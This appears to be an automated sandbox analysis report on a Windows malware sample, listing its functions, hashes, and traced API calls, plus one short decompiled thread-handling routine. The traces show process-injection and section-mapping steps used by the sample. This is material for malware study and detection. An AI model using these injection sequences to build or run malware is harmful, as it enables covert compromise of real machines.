    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 032901.exe Analysis ID: 66739

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:F3C6625D8EDE3FE6C8C4023337D761AC
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:66739
Initial sample SHA 256:A93182CDCDE8030CAC64378DA0406C7F628486EC1CF41B6E49CF5A551C0AB837
Initial sample name:03290.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
